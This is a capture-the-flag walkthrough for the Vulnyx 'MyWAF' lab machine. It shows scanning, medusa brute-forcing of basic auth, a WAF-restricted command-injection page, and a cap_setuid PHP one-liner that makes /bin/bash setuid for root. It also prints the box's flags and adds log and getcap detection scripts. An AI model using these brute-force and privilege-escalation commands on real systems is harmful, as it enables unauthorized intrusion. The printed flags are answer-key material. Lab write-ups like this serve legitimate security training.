Vulnyx-MyWAF-Walkthrough
城南花已开

Information Gathering

Service Detection

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.211 08:00:27:ec:12:5f PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e5:e5:eb VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.094 seconds (122.25 hosts/sec). 4 responded
export ip=192.168.60.211
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports like it's my full-time job. Wait, it is.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.211:22
Open 192.168.60.211:80
Open 192.168.60.211:3306
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-26 21:19 CST
Initiating ARP Ping Scan at 21:19
Scanning 192.168.60.211 [1 port]
Completed ARP Ping Scan at 21:19, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:19
Completed Parallel DNS resolution of 1 host. at 21:19, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:19
Scanning 192.168.60.211 [3 ports]
Discovered open port 3306/tcp on 192.168.60.211
Discovered open port 22/tcp on 192.168.60.211
Discovered open port 80/tcp on 192.168.60.211
Completed SYN Stealth Scan at 21:19, 0.03s elapsed (3 total ports)
Nmap scan report for 192.168.60.211
Host is up, received arp-response (0.00036s latency).
Scanned at 2025-02-26 21:19:01 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
3306/tcp open mysql syn-ack ttl 64
MAC Address: 08:00:27:EC:12:5F (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Open port 80 in a browser, then edit /etc/hosts to add the domain name.

sudo vim /etc/hosts
[sudo] password for Pepster:
192.168.60.211 www.mywaf.nyx

Entry Point

There is a registration form.


After registering successfully:


Two more domain names show up, so add them as well.

sudo vim /etc/hosts
192.168.60.211 www.mywaf.nyx maintenance.mywaf.nyx configure.mywaf.nyx

Commands can be executed here.


But when I try to spawn a reverse shell, it returns a 403 unauthorized error.

Probably the WAF is blocking it; keywords such as nc are not allowed.

I found that spaces and chaining characters such as -|;& don't seem to be allowed either.

I tried a lot of things, with no result.

Brute-forcing Basic Authorization

Time to change direction.

The configure.mywaf.nyx host requires a login.


Brute-force it directly; hydra throws errors, so medusa is used instead.

Burp Suite works here too; it is a matter of personal preference.

This yields the credentials admin:security.

❯ medusa  -h configure.mywaf.nyx -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M http -m DIR:/ -T 10 -f -v 04
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>

ACCOUNT FOUND: [http] Host: configure.mywaf.nyx User: admin Password: security [SUCCESS]
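From the defender's side, a brute-force run like the one above is easy to spot in the web server's access log: a burst of 401 responses from one client, followed by a 200 that carries an authenticated username. The following is an added example and not part of the original walkthrough; the log lines are constructed sample data, the vhost is the one from this box, and the client addresses, timestamps and the user bob are made up.

```shell
# Constructed sample access log (combined format) for configure.mywaf.nyx.
# Six 401s from one client followed by a 200 as "admin" is what a medusa
# run that ends in a found credential looks like; the other client is normal use.
SAMPLE_LOG='192.168.60.100 - - [26/Feb/2025:21:40:01 +0800] "GET / HTTP/1.1" 401 381 "-" "Mozilla/5.0"
192.168.60.100 - - [26/Feb/2025:21:40:01 +0800] "GET / HTTP/1.1" 401 381 "-" "Mozilla/5.0"
192.168.60.100 - - [26/Feb/2025:21:40:02 +0800] "GET / HTTP/1.1" 401 381 "-" "Mozilla/5.0"
192.168.60.100 - - [26/Feb/2025:21:40:02 +0800] "GET / HTTP/1.1" 401 381 "-" "Mozilla/5.0"
192.168.60.100 - - [26/Feb/2025:21:40:03 +0800] "GET / HTTP/1.1" 401 381 "-" "Mozilla/5.0"
192.168.60.100 - - [26/Feb/2025:21:40:03 +0800] "GET / HTTP/1.1" 401 381 "-" "Mozilla/5.0"
192.168.60.100 - admin [26/Feb/2025:21:40:04 +0800] "GET / HTTP/1.1" 200 1530 "-" "Mozilla/5.0"
192.168.60.50 - - [26/Feb/2025:21:41:10 +0800] "GET / HTTP/1.1" 401 381 "-" "curl/8.0"
192.168.60.50 - bob [26/Feb/2025:21:41:12 +0800] "GET / HTTP/1.1" 200 1530 "-" "curl/8.0"'

# Read an access log on stdin and print "ip count" for every client with
# at least $1 responses of status 401 (status is field 9 in combined format).
find_bruteforce_sources() {
    awk -v t="$1" '$9 == 401 { n[$1]++ }
        END { for (ip in n) if (n[ip] >= t) print ip, n[ip] }' | sort
}

# Stronger signal: a client that accumulated at least $1 failures and then
# received a 2xx with a real username, i.e. a guess succeeded. Prints "ip user".
find_success_after_failures() {
    awk -v t="$1" '
        $9 == 401 { n[$1]++ }
        $9 ~ /^2/ && $3 != "-" && n[$1] >= t { print $1, $3; n[$1] = 0 }' | sort
}

# Wrappers that run both checks over the constructed sample with threshold 5.
demo_sources() { printf '%s\n' "$SAMPLE_LOG" | find_bruteforce_sources 5; }
demo_success() { printf '%s\n' "$SAMPLE_LOG" | find_success_after_failures 5; }
```

Against a real server, feed the log in on stdin, e.g. `find_bruteforce_sources 20 < /var/log/apache2/access.log`, and pick a threshold that fits the site's normal traffic.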

Log in.

It looks like a level setting can be changed.

Presumably this adjusts how strictly the command-execution input is checked.


Change it to Nivel 3.

Now spaces are accepted in command execution, although some characters are still blocked.

Use busybox to get a reverse shell.


User Privilege Escalation

Listen on the port; from /etc/passwd we learn that the user is nohydragent.

❯ pwncat-cs -lp 4444
[22:08:44] Welcome to pwncat 🐈! __main__.py:164
[22:08:47] received connection from 192.168.60.211:51074 bind.py:84
[22:08:48] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
192.168.60.211:51074: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@mywaf:/var/www/maintenance.mywaf.nyx$ cat /etc/passwd |grep /bin/bash
root:x:0:0:root:/root:/bin/bash
nohydragent:x:1000:1000:,,,:/home/nohydragent:/bin/bash

Root Privilege Escalation

php8.2 carries the cap_setuid=ep capability,

and the file is owned by root.

(remote) www-data@mywaf:/tmp$ getcap -r /
/opt/phps/php8.2 cap_setuid=ep
/usr/bin/ping cap_net_raw=ep
(remote) www-data@mywaf:/tmp$ ls -al /opt/phps/
total 5532
drwxr-xr-x 2 root root 4096 Jun 19 2024 .
drwxr-xr-x 3 root root 4096 Jun 19 2024 ..
-rwxr-xr-x 1 root root 5654232 Jun 19 2024 php8.2

Escalate privileges using PHP's capability.

Note that you must use the php binary under /opt/phps; the php8.2 found on PATH does not have the permission.

(remote) www-data@mywaf:/opt/phps$ php8.2 -r "posix_setuid(0); system('chmod +s /bin/bash');"
chmod: changing permissions of '/bin/bash': Operation not permitted
(remote) www-data@mywaf:/opt/phps$ which php8.2
/usr/bin/php8.2
(remote) www-data@mywaf:/opt/phps$ ./php8.2 -r "posix_setuid(0); system('chmod +s /bin/bash');"
(remote) www-data@mywaf:/opt/phps$ bash -p
(remote) root@mywaf:/opt/phps# whoami
root
(remote) root@mywaf:/opt/phps# cat /root/root.txt
0fe16399c94ba69bc4e499d85b1b27d7
(remote) root@mywaf:/opt/phps# cat /home/nohydragent/user.txt
219074c9ca90fe6fe025e7eb4e67b3bf
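The root cause on this box is a root-owned, world-executable PHP binary carrying cap_setuid, which is as good as a setuid-root shell. As an added example (not part of the original walkthrough), this shell audit parses getcap output in both the newer `path cap=flags` style shown above and the older `path = cap+flags` style, and flags the capabilities that hand out root-equivalent power. The sample input is constructed from the two lines above plus one made-up old-style entry (/usr/local/bin/old-helper).

```shell
# File capabilities that on their own let an unprivileged caller become root
# or read/write any file. cap_setuid is the one abused on this box.
DANGEROUS_CAPS='cap_setuid|cap_setgid|cap_dac_override|cap_dac_read_search|cap_sys_admin|cap_sys_ptrace|cap_sys_module|cap_chown|cap_fowner'

# Constructed sample: the two real lines from the walkthrough plus a
# made-up entry in the older libcap output style (path = caps+flags).
SAMPLE_GETCAP='/opt/phps/php8.2 cap_setuid=ep
/usr/bin/ping cap_net_raw=ep
/usr/local/bin/old-helper = cap_dac_override+eip'

# Read getcap output on stdin; print "path capability flags" for each
# dangerous capability found. Both output styles are normalised first.
flag_dangerous_caps() {
    sed -e 's/ = / /' -e 's/+\([eip]*\)$/=\1/' |
    awk -v pat="$DANGEROUS_CAPS" '
        NF >= 2 {
            split($2, kv, "=")              # kv[1] = cap list, kv[2] = flags
            ncaps = split(kv[1], caps, ",")
            for (i = 1; i <= ncaps; i++)
                if (caps[i] ~ ("^(" pat ")$")) print $1, caps[i], kv[2]
        }' | sort
}

# Run the audit against the live system (needs getcap from libcap).
# Remediation is to drop the capability, e.g. setcap -r /opt/phps/php8.2,
# or at least to remove world-execute from a binary that must keep it.
audit_host_caps() { getcap -r / 2>/dev/null | flag_dangerous_caps; }

# Runs the parser over the constructed sample; ping is correctly left alone.
demo_caps() { printf '%s\n' "$SAMPLE_GETCAP" | flag_dangerous_caps; }
```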
